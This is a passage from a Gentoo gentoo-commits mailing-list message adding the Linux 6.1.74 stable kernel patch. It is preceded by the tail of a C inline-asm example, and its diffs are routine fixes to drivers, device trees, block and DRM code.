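		     : "memory");

	printf("flags = 0x%llx\n", (unsigned long long)out);
	return 0;
}

Built with gcc -O2, the load inside the asm is guaranteed to observe the earlier store only because of the clobber, which is exactly the hazard the EMODPE/EACCEPT hunks close.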


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-20 11:45 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-20 11:45 UTC (permalink / raw
  To: gentoo-commits

commit:     e03cb0c42952561dd7ad061b371076b7defafa36
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sat Jan 20 11:45:31 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sat Jan 20 11:45:31 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=e03cb0c4

Linux patch 6.1.74

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1073_linux-6.1.74.patch | 3175 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3179 insertions(+)

diff --git a/0000_README b/0000_README
index 9cb280cd..32442528 100644
--- a/0000_README
+++ b/0000_README
@@ -335,6 +335,10 @@ Patch:  1072_linux-6.1.73.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.73
 
+Patch:  1073_linux-6.1.74.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.74
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1073_linux-6.1.74.patch b/1073_linux-6.1.74.patch
new file mode 100644
index 00000000..4e3e51d3
--- /dev/null
+++ b/1073_linux-6.1.74.patch
@@ -0,0 +1,3175 @@
+diff --git a/Makefile b/Makefile
+index e4f2d019ca745..63125d1ffd9cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 73
++SUBLEVEL = 74
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arc/kernel/signal.c b/arch/arc/kernel/signal.c
+index 3c1590c27fae3..723abcb10c801 100644
+--- a/arch/arc/kernel/signal.c
++++ b/arch/arc/kernel/signal.c
+@@ -61,7 +61,7 @@ struct rt_sigframe {
+ 	unsigned int sigret_magic;
+ };
+ 
+-static int save_arcv2_regs(struct sigcontext *mctx, struct pt_regs *regs)
++static int save_arcv2_regs(struct sigcontext __user *mctx, struct pt_regs *regs)
+ {
+ 	int err = 0;
+ #ifndef CONFIG_ISA_ARCOMPACT
+@@ -74,12 +74,12 @@ static int save_arcv2_regs(struct sigcontext *mctx, struct pt_regs *regs)
+ #else
+ 	v2abi.r58 = v2abi.r59 = 0;
+ #endif
+-	err = __copy_to_user(&mctx->v2abi, &v2abi, sizeof(v2abi));
++	err = __copy_to_user(&mctx->v2abi, (void const *)&v2abi, sizeof(v2abi));
+ #endif
+ 	return err;
+ }
+ 
+-static int restore_arcv2_regs(struct sigcontext *mctx, struct pt_regs *regs)
++static int restore_arcv2_regs(struct sigcontext __user *mctx, struct pt_regs *regs)
+ {
+ 	int err = 0;
+ #ifndef CONFIG_ISA_ARCOMPACT
+diff --git a/arch/arm/mach-sunxi/mc_smp.c b/arch/arm/mach-sunxi/mc_smp.c
+index b2f5f4f28705f..f779e386b6e7d 100644
+--- a/arch/arm/mach-sunxi/mc_smp.c
++++ b/arch/arm/mach-sunxi/mc_smp.c
+@@ -804,12 +804,12 @@ static int __init sunxi_mc_smp_init(void)
+ 	for (i = 0; i < ARRAY_SIZE(sunxi_mc_smp_data); i++) {
+ 		ret = of_property_match_string(node, "enable-method",
+ 					       sunxi_mc_smp_data[i].enable_method);
+-		if (!ret)
++		if (ret >= 0)
+ 			break;
+ 	}
+ 
+ 	of_node_put(node);
+-	if (ret)
++	if (ret < 0)
+ 		return -ENODEV;
+ 
+ 	is_a83t = sunxi_mc_smp_data[i].is_a83t;
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi
+index ee6095baba4d3..7d9b8064ad2ec 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-gru-chromebook.dtsi
+@@ -510,8 +510,7 @@ ap_i2c_tp: &i2c5 {
+ &pci_rootport {
+ 	mvl_wifi: wifi@0,0 {
+ 		compatible = "pci1b4b,2b42";
+-		reg = <0x83010000 0x0 0x00000000 0x0 0x00100000
+-		       0x83010000 0x0 0x00100000 0x0 0x00100000>;
++		reg = <0x0000 0x0 0x0 0x0 0x0>;
+ 		interrupt-parent = <&gpio0>;
+ 		interrupts = <8 IRQ_TYPE_LEVEL_LOW>;
+ 		pinctrl-names = "default";
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts b/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts
+index 853e88455e750..9e4b12ed62cbe 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-gru-scarlet-dumo.dts
+@@ -34,8 +34,8 @@
+ &pci_rootport {
+ 	wifi@0,0 {
+ 		compatible = "qcom,ath10k";
+-		reg = <0x00010000 0x0 0x00000000 0x0 0x00000000>,
+-		      <0x03010010 0x0 0x00000000 0x0 0x00200000>;
++		reg = <0x00000000 0x0 0x00000000 0x0 0x00000000>,
++		      <0x03000010 0x0 0x00000000 0x0 0x00200000>;
+ 		qcom,ath10k-calibration-variant = "GO_DUMO";
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi
+index 23bfba86daabe..7ba25315dd9ab 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-gru.dtsi
+@@ -489,6 +489,7 @@ ap_i2c_audio: &i2c8 {
+ 		#address-cells = <3>;
+ 		#size-cells = <2>;
+ 		ranges;
++		device_type = "pci";
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 234b5bbda1204..f4d6dbbbddcd4 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -958,7 +958,7 @@
+ 			     <GIC_SPI 73 IRQ_TYPE_LEVEL_HIGH>,
+ 			     <GIC_SPI 72 IRQ_TYPE_LEVEL_HIGH>,
+ 			     <GIC_SPI 71 IRQ_TYPE_LEVEL_HIGH>;
+-		interrupt-names = "sys", "pmc", "msi", "legacy", "err";
++		interrupt-names = "sys", "pmc", "msg", "legacy", "err";
+ 		bus-range = <0x0 0xf>;
+ 		clocks = <&cru ACLK_PCIE20_MST>, <&cru ACLK_PCIE20_SLV>,
+ 			 <&cru ACLK_PCIE20_DBI>, <&cru PCLK_PCIE20>,
+diff --git a/arch/loongarch/include/asm/elf.h b/arch/loongarch/include/asm/elf.h
+index b9a4ab54285c1..9b16a3b8e7060 100644
+--- a/arch/loongarch/include/asm/elf.h
++++ b/arch/loongarch/include/asm/elf.h
+@@ -293,7 +293,7 @@ extern const char *__elf_platform;
+ #define ELF_PLAT_INIT(_r, load_addr)	do { \
+ 	_r->regs[1] = _r->regs[2] = _r->regs[3] = _r->regs[4] = 0;	\
+ 	_r->regs[5] = _r->regs[6] = _r->regs[7] = _r->regs[8] = 0;	\
+-	_r->regs[9] = _r->regs[10] = _r->regs[11] = _r->regs[12] = 0;	\
++	_r->regs[9] = _r->regs[10] /* syscall n */ = _r->regs[12] = 0;	\
+ 	_r->regs[13] = _r->regs[14] = _r->regs[15] = _r->regs[16] = 0;	\
+ 	_r->regs[17] = _r->regs[18] = _r->regs[19] = _r->regs[20] = 0;	\
+ 	_r->regs[21] = _r->regs[22] = _r->regs[23] = _r->regs[24] = 0;	\
+diff --git a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+index 8143a61111e33..c16b521308cb1 100644
+--- a/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
++++ b/arch/mips/boot/dts/loongson/loongson64-2k1000.dtsi
+@@ -123,8 +123,7 @@
+ 				compatible = "pci0014,7a03.0",
+ 						   "pci0014,7a03",
+ 						   "pciclass0c0320",
+-						   "pciclass0c03",
+-						   "loongson, pci-gmac";
++						   "pciclass0c03";
+ 
+ 				reg = <0x1800 0x0 0x0 0x0 0x0>;
+ 				interrupts = <12 IRQ_TYPE_LEVEL_LOW>,
+diff --git a/arch/mips/boot/dts/loongson/ls7a-pch.dtsi b/arch/mips/boot/dts/loongson/ls7a-pch.dtsi
+index 2f45fce2cdc4a..ed99ee316febb 100644
+--- a/arch/mips/boot/dts/loongson/ls7a-pch.dtsi
++++ b/arch/mips/boot/dts/loongson/ls7a-pch.dtsi
+@@ -186,8 +186,7 @@
+ 				compatible = "pci0014,7a03.0",
+ 						   "pci0014,7a03",
+ 						   "pciclass020000",
+-						   "pciclass0200",
+-						   "loongson, pci-gmac";
++						   "pciclass0200";
+ 
+ 				reg = <0x1800 0x0 0x0 0x0 0x0>;
+ 				interrupts = <12 IRQ_TYPE_LEVEL_HIGH>,
+diff --git a/block/blk-mq.c b/block/blk-mq.c
+index 383d94615e502..368f1947c8956 100644
+--- a/block/blk-mq.c
++++ b/block/blk-mq.c
+@@ -1500,14 +1500,26 @@ void blk_mq_delay_kick_requeue_list(struct request_queue *q,
+ }
+ EXPORT_SYMBOL(blk_mq_delay_kick_requeue_list);
+ 
++static bool blk_is_flush_data_rq(struct request *rq)
++{
++	return (rq->rq_flags & RQF_FLUSH_SEQ) && !is_flush_rq(rq);
++}
++
+ static bool blk_mq_rq_inflight(struct request *rq, void *priv)
+ {
+ 	/*
+ 	 * If we find a request that isn't idle we know the queue is busy
+ 	 * as it's checked in the iter.
+ 	 * Return false to stop the iteration.
++	 *
++	 * In case of queue quiesce, if one flush data request is completed,
++	 * don't count it as inflight given the flush sequence is suspended,
++	 * and the original flush data request is invisible to driver, just
++	 * like other pending requests because of quiesce
+ 	 */
+-	if (blk_mq_request_started(rq)) {
++	if (blk_mq_request_started(rq) && !(blk_queue_quiesced(rq->q) &&
++				blk_is_flush_data_rq(rq) &&
++				blk_mq_request_completed(rq))) {
+ 		bool *busy = priv;
+ 
+ 		*busy = true;
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index c297e40c5bdc0..5ebeb0d7b6be0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -512,6 +512,13 @@ static const struct dmi_system_id maingear_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "GMxXGxx"),
+ 		},
+ 	},
++	{
++		/* TongFang GMxXGxx sold as Eluktronics Inc. RP-15 */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "Eluktronics Inc."),
++			DMI_MATCH(DMI_BOARD_NAME, "RP-15"),
++		},
++	},
+ 	{
+ 		/* TongFang GM6XGxX/TUXEDO Stellaris 16 Gen5 AMD */
+ 		.matches = {
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index 9cc3a2b1b4fc1..d933ef6cc65af 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -5005,7 +5005,7 @@ static __poll_t binder_poll(struct file *filp,
+ 
+ 	thread = binder_get_thread(proc);
+ 	if (!thread)
+-		return POLLERR;
++		return EPOLLERR;
+ 
+ 	binder_inner_proc_lock(thread->proc);
+ 	thread->looper |= BINDER_LOOPER_STATE_POLL;
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index cd87f12733f27..ed607850f87fb 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -557,7 +557,7 @@ err_alloc_buf_struct_failed:
+  * is the sum of the three given sizes (each rounded up to
+  * pointer-sized boundary)
+  *
+- * Return:	The allocated buffer or %NULL if error
++ * Return:	The allocated buffer or %ERR_PTR(-errno) if error
+  */
+ struct binder_buffer *binder_alloc_new_buf(struct binder_alloc *alloc,
+ 					   size_t data_size,
+@@ -706,7 +706,7 @@ void binder_alloc_free_buf(struct binder_alloc *alloc,
+ 	/*
+ 	 * We could eliminate the call to binder_alloc_clear_buf()
+ 	 * from binder_alloc_deferred_release() by moving this to
+-	 * binder_alloc_free_buf_locked(). However, that could
++	 * binder_free_buf_locked(). However, that could
+ 	 * increase contention for the alloc mutex if clear_on_free
+ 	 * is used frequently for large buffers. The mutex is not
+ 	 * needed for correctness here.
+@@ -1005,7 +1005,9 @@ enum lru_status binder_alloc_free_page(struct list_head *item,
+ 		goto err_mmget;
+ 	if (!mmap_read_trylock(mm))
+ 		goto err_mmap_read_lock_failed;
+-	vma = binder_alloc_get_vma(alloc);
++	vma = vma_lookup(mm, page_addr);
++	if (vma && vma != binder_alloc_get_vma(alloc))
++		goto err_invalid_vma;
+ 
+ 	list_lru_isolate(lru, item);
+ 	spin_unlock(lock);
+@@ -1031,6 +1033,8 @@ enum lru_status binder_alloc_free_page(struct list_head *item,
+ 	mutex_unlock(&alloc->mutex);
+ 	return LRU_REMOVED_RETRY;
+ 
++err_invalid_vma:
++	mmap_read_unlock(mm);
+ err_mmap_read_lock_failed:
+ 	mmput_async(mm);
+ err_mmget:
+diff --git a/drivers/block/virtio_blk.c b/drivers/block/virtio_blk.c
+index efa5535a8e1d8..3124837aa406f 100644
+--- a/drivers/block/virtio_blk.c
++++ b/drivers/block/virtio_blk.c
+@@ -609,12 +609,12 @@ static void virtblk_config_changed(struct virtio_device *vdev)
+ static int init_vq(struct virtio_blk *vblk)
+ {
+ 	int err;
+-	int i;
++	unsigned short i;
+ 	vq_callback_t **callbacks;
+ 	const char **names;
+ 	struct virtqueue **vqs;
+ 	unsigned short num_vqs;
+-	unsigned int num_poll_vqs;
++	unsigned short num_poll_vqs;
+ 	struct virtio_device *vdev = vblk->vdev;
+ 	struct irq_affinity desc = { 0, };
+ 
+@@ -658,13 +658,13 @@ static int init_vq(struct virtio_blk *vblk)
+ 
+ 	for (i = 0; i < num_vqs - num_poll_vqs; i++) {
+ 		callbacks[i] = virtblk_done;
+-		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req.%d", i);
++		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req.%u", i);
+ 		names[i] = vblk->vqs[i].name;
+ 	}
+ 
+ 	for (; i < num_vqs; i++) {
+ 		callbacks[i] = NULL;
+-		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req_poll.%d", i);
++		snprintf(vblk->vqs[i].name, VQ_NAME_LEN, "req_poll.%u", i);
+ 		names[i] = vblk->vqs[i].name;
+ 	}
+ 
+diff --git a/drivers/clk/rockchip/clk-rk3128.c b/drivers/clk/rockchip/clk-rk3128.c
+index aa53797dbfc14..7782785a86e69 100644
+--- a/drivers/clk/rockchip/clk-rk3128.c
++++ b/drivers/clk/rockchip/clk-rk3128.c
+@@ -490,7 +490,7 @@ static struct rockchip_clk_branch common_clk_branches[] __initdata = {
+ 	GATE(HCLK_I2S_2CH, "hclk_i2s_2ch", "hclk_peri", 0, RK2928_CLKGATE_CON(7), 2, GFLAGS),
+ 	GATE(0, "hclk_usb_peri", "hclk_peri", CLK_IGNORE_UNUSED, RK2928_CLKGATE_CON(9), 13, GFLAGS),
+ 	GATE(HCLK_HOST2, "hclk_host2", "hclk_peri", 0, RK2928_CLKGATE_CON(7), 3, GFLAGS),
+-	GATE(HCLK_OTG, "hclk_otg", "hclk_peri", 0, RK2928_CLKGATE_CON(3), 13, GFLAGS),
++	GATE(HCLK_OTG, "hclk_otg", "hclk_peri", 0, RK2928_CLKGATE_CON(5), 13, GFLAGS),
+ 	GATE(0, "hclk_peri_ahb", "hclk_peri", CLK_IGNORE_UNUSED, RK2928_CLKGATE_CON(9), 14, GFLAGS),
+ 	GATE(HCLK_SPDIF, "hclk_spdif", "hclk_peri", 0, RK2928_CLKGATE_CON(10), 9, GFLAGS),
+ 	GATE(HCLK_TSP, "hclk_tsp", "hclk_peri", 0, RK2928_CLKGATE_CON(10), 12, GFLAGS),
+diff --git a/drivers/clk/rockchip/clk-rk3568.c b/drivers/clk/rockchip/clk-rk3568.c
+index 2f54f630c8b65..1ffb755feea4f 100644
+--- a/drivers/clk/rockchip/clk-rk3568.c
++++ b/drivers/clk/rockchip/clk-rk3568.c
+@@ -72,6 +72,7 @@ static struct rockchip_pll_rate_table rk3568_pll_rates[] = {
+ 	RK3036_PLL_RATE(408000000, 1, 68, 2, 2, 1, 0),
+ 	RK3036_PLL_RATE(312000000, 1, 78, 6, 1, 1, 0),
+ 	RK3036_PLL_RATE(297000000, 2, 99, 4, 1, 1, 0),
++	RK3036_PLL_RATE(292500000, 1, 195, 4, 4, 1, 0),
+ 	RK3036_PLL_RATE(241500000, 2, 161, 4, 2, 1, 0),
+ 	RK3036_PLL_RATE(216000000, 1, 72, 4, 2, 1, 0),
+ 	RK3036_PLL_RATE(200000000, 1, 100, 3, 4, 1, 0),
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+index fd796574f87a5..8123feb1a1161 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_debugfs.c
+@@ -479,6 +479,9 @@ static ssize_t amdgpu_debugfs_regs_didt_read(struct file *f, char __user *buf,
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
++	if (!adev->didt_rreg)
++		return -EOPNOTSUPP;
++
+ 	r = pm_runtime_get_sync(adev_to_drm(adev)->dev);
+ 	if (r < 0) {
+ 		pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+@@ -535,6 +538,9 @@ static ssize_t amdgpu_debugfs_regs_didt_write(struct file *f, const char __user
+ 	if (size & 0x3 || *pos & 0x3)
+ 		return -EINVAL;
+ 
++	if (!adev->didt_wreg)
++		return -EOPNOTSUPP;
++
+ 	r = pm_runtime_get_sync(adev_to_drm(adev)->dev);
+ 	if (r < 0) {
+ 		pm_runtime_put_autosuspend(adev_to_drm(adev)->dev);
+diff --git a/drivers/gpu/drm/amd/amdgpu/soc15.c b/drivers/gpu/drm/amd/amdgpu/soc15.c
+index 2eddd7f6cd41e..811dd3ea63620 100644
+--- a/drivers/gpu/drm/amd/amdgpu/soc15.c
++++ b/drivers/gpu/drm/amd/amdgpu/soc15.c
+@@ -1411,9 +1411,11 @@ static void soc15_common_get_clockgating_state(void *handle, u64 *flags)
+ 	if (amdgpu_sriov_vf(adev))
+ 		*flags = 0;
+ 
+-	adev->nbio.funcs->get_clockgating_state(adev, flags);
++	if (adev->nbio.funcs && adev->nbio.funcs->get_clockgating_state)
++		adev->nbio.funcs->get_clockgating_state(adev, flags);
+ 
+-	adev->hdp.funcs->get_clock_gating_state(adev, flags);
++	if (adev->hdp.funcs && adev->hdp.funcs->get_clock_gating_state)
++		adev->hdp.funcs->get_clock_gating_state(adev, flags);
+ 
+ 	if (adev->ip_versions[MP0_HWIP][0] != IP_VERSION(13, 0, 2)) {
+ 
+@@ -1429,9 +1431,11 @@ static void soc15_common_get_clockgating_state(void *handle, u64 *flags)
+ 	}
+ 
+ 	/* AMD_CG_SUPPORT_ROM_MGCG */
+-	adev->smuio.funcs->get_clock_gating_state(adev, flags);
++	if (adev->smuio.funcs && adev->smuio.funcs->get_clock_gating_state)
++		adev->smuio.funcs->get_clock_gating_state(adev, flags);
+ 
+-	adev->df.funcs->get_clockgating_state(adev, flags);
++	if (adev->df.funcs && adev->df.funcs->get_clockgating_state)
++		adev->df.funcs->get_clockgating_state(adev, flags);
+ }
+ 
+ static int soc15_common_set_powergating_state(void *handle,
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index e507d2e1410b7..93e40e0a15087 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -1018,13 +1018,20 @@ static enum bp_result get_ss_info_v4_5(
+ 		DC_LOG_BIOS("AS_SIGNAL_TYPE_HDMI ss_percentage: %d\n", ss_info->spread_spectrum_percentage);
+ 		break;
+ 	case AS_SIGNAL_TYPE_DISPLAY_PORT:
+-		ss_info->spread_spectrum_percentage =
++		if (bp->base.integrated_info) {
++			DC_LOG_BIOS("gpuclk_ss_percentage (unit of 0.001 percent): %d\n", bp->base.integrated_info->gpuclk_ss_percentage);
++			ss_info->spread_spectrum_percentage =
++					bp->base.integrated_info->gpuclk_ss_percentage;
++			ss_info->type.CENTER_MODE =
++					bp->base.integrated_info->gpuclk_ss_type;
++		} else {
++			ss_info->spread_spectrum_percentage =
+ 				disp_cntl_tbl->dp_ss_percentage;
+-		ss_info->spread_spectrum_range =
++			ss_info->spread_spectrum_range =
+ 				disp_cntl_tbl->dp_ss_rate_10hz * 10;
+-		if (disp_cntl_tbl->dp_ss_mode & ATOM_SS_CENTRE_SPREAD_MODE)
+-			ss_info->type.CENTER_MODE = true;
+-
++			if (disp_cntl_tbl->dp_ss_mode & ATOM_SS_CENTRE_SPREAD_MODE)
++				ss_info->type.CENTER_MODE = true;
++		}
+ 		DC_LOG_BIOS("AS_SIGNAL_TYPE_DISPLAY_PORT ss_percentage: %d\n", ss_info->spread_spectrum_percentage);
+ 		break;
+ 	case AS_SIGNAL_TYPE_GPU_PLL:
+@@ -2830,6 +2837,8 @@ static enum bp_result get_integrated_info_v2_2(
+ 	info->ma_channel_number = info_v2_2->umachannelnumber;
+ 	info->dp_ss_control =
+ 		le16_to_cpu(info_v2_2->reserved1);
++	info->gpuclk_ss_percentage = info_v2_2->gpuclk_ss_percentage;
++	info->gpuclk_ss_type = info_v2_2->gpuclk_ss_type;
+ 
+ 	for (i = 0; i < NUMBER_OF_UCHAR_FOR_GUID; ++i) {
+ 		info->ext_disp_conn_info.gu_id[i] =
+diff --git a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+index 893991a0eb971..28b83133db910 100644
+--- a/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
++++ b/drivers/gpu/drm/amd/display/dc/clk_mgr/dcn315/dcn315_clk_mgr.c
+@@ -324,7 +324,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_A,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+@@ -332,7 +332,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_B,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+@@ -340,7 +340,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_C,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+@@ -348,7 +348,7 @@ static struct wm_table lpddr5_wm_table = {
+ 		{
+ 			.wm_inst = WM_D,
+ 			.wm_type = WM_TYPE_PSTATE_CHG,
+-			.pstate_latency_us = 11.65333,
++			.pstate_latency_us = 129.0,
+ 			.sr_exit_time_us = 11.5,
+ 			.sr_enter_plus_exit_time_us = 14.5,
+ 			.valid = true,
+diff --git a/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h b/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h
+index bc96d02113608..813463ffe15c5 100644
+--- a/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h
++++ b/drivers/gpu/drm/amd/display/include/grph_object_ctrl_defs.h
+@@ -417,6 +417,8 @@ struct integrated_info {
+ 	/* V2.1 */
+ 	struct edp_info edp1_info;
+ 	struct edp_info edp2_info;
++	uint32_t gpuclk_ss_percentage;
++	uint32_t gpuclk_ss_type;
+ };
+ 
+ /*
+diff --git a/drivers/gpu/drm/drm_crtc.c b/drivers/gpu/drm/drm_crtc.c
+index df9bf3c9206e7..cb90e70d85e86 100644
+--- a/drivers/gpu/drm/drm_crtc.c
++++ b/drivers/gpu/drm/drm_crtc.c
+@@ -715,8 +715,7 @@ int drm_mode_setcrtc(struct drm_device *dev, void *data,
+ 	struct drm_mode_set set;
+ 	uint32_t __user *set_connectors_ptr;
+ 	struct drm_modeset_acquire_ctx ctx;
+-	int ret;
+-	int i;
++	int ret, i, num_connectors = 0;
+ 
+ 	if (!drm_core_check_feature(dev, DRIVER_MODESET))
+ 		return -EOPNOTSUPP;
+@@ -871,6 +870,7 @@ int drm_mode_setcrtc(struct drm_device *dev, void *data,
+ 					connector->name);
+ 
+ 			connector_set[i] = connector;
++			num_connectors++;
+ 		}
+ 	}
+ 
+@@ -879,7 +879,7 @@ int drm_mode_setcrtc(struct drm_device *dev, void *data,
+ 	set.y = crtc_req->y;
+ 	set.mode = mode;
+ 	set.connectors = connector_set;
+-	set.num_connectors = crtc_req->count_connectors;
++	set.num_connectors = num_connectors;
+ 	set.fb = fb;
+ 
+ 	if (drm_drv_uses_atomic_modeset(dev))
+@@ -892,7 +892,7 @@ out:
+ 		drm_framebuffer_put(fb);
+ 
+ 	if (connector_set) {
+-		for (i = 0; i < crtc_req->count_connectors; i++) {
++		for (i = 0; i < num_connectors; i++) {
+ 			if (connector_set[i])
+ 				drm_connector_put(connector_set[i]);
+ 		}
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_dma.c b/drivers/gpu/drm/exynos/exynos_drm_dma.c
+index a971590b81323..e2c7373f20c6b 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_dma.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_dma.c
+@@ -107,18 +107,16 @@ int exynos_drm_register_dma(struct drm_device *drm, struct device *dev,
+ 		return 0;
+ 
+ 	if (!priv->mapping) {
+-		void *mapping;
++		void *mapping = NULL;
+ 
+ 		if (IS_ENABLED(CONFIG_ARM_DMA_USE_IOMMU))
+ 			mapping = arm_iommu_create_mapping(&platform_bus_type,
+ 				EXYNOS_DEV_ADDR_START, EXYNOS_DEV_ADDR_SIZE);
+ 		else if (IS_ENABLED(CONFIG_IOMMU_DMA))
+ 			mapping = iommu_get_domain_for_dev(priv->dma_dev);
+-		else
+-			mapping = ERR_PTR(-ENODEV);
+ 
+-		if (IS_ERR(mapping))
+-			return PTR_ERR(mapping);
++		if (!mapping)
++			return -ENODEV;
+ 		priv->mapping = mapping;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/exynos/exynos_hdmi.c b/drivers/gpu/drm/exynos/exynos_hdmi.c
+index b7c11bdce2c89..1a7194a653ae5 100644
+--- a/drivers/gpu/drm/exynos/exynos_hdmi.c
++++ b/drivers/gpu/drm/exynos/exynos_hdmi.c
+@@ -1861,6 +1861,8 @@ static int hdmi_bind(struct device *dev, struct device *master, void *data)
+ 		return ret;
+ 
+ 	crtc = exynos_drm_crtc_get_by_type(drm_dev, EXYNOS_DISPLAY_TYPE_HDMI);
++	if (IS_ERR(crtc))
++		return PTR_ERR(crtc);
+ 	crtc->pipe_clk = &hdata->phy_clk;
+ 
+ 	ret = hdmi_create_connector(encoder);
+diff --git a/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c b/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c
+index 6cb5eefa45e9a..5a08458fe1b7f 100644
+--- a/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c
++++ b/drivers/gpu/drm/nouveau/nvkm/subdev/mmu/vmmtu102.c
+@@ -31,7 +31,7 @@ tu102_vmm_flush(struct nvkm_vmm *vmm, int depth)
+ 
+ 	type |= 0x00000001; /* PAGE_ALL */
+ 	if (atomic_read(&vmm->engref[NVKM_SUBDEV_BAR]))
+-		type |= 0x00000004; /* HUB_ONLY */
++		type |= 0x00000006; /* HUB_ONLY | ALL PDB (hack) */
+ 
+ 	mutex_lock(&vmm->mmu->mutex);
+ 
+diff --git a/drivers/hid/hid-nintendo.c b/drivers/hid/hid-nintendo.c
+index 8a8a3dd8af0c1..df07e3ae0ffb4 100644
+--- a/drivers/hid/hid-nintendo.c
++++ b/drivers/hid/hid-nintendo.c
+@@ -325,28 +325,28 @@ struct joycon_imu_cal {
+  * All the controller's button values are stored in a u32.
+  * They can be accessed with bitwise ANDs.
+  */
+-static const u32 JC_BTN_Y	= BIT(0);
+-static const u32 JC_BTN_X	= BIT(1);
+-static const u32 JC_BTN_B	= BIT(2);
+-static const u32 JC_BTN_A	= BIT(3);
+-static const u32 JC_BTN_SR_R	= BIT(4);
+-static const u32 JC_BTN_SL_R	= BIT(5);
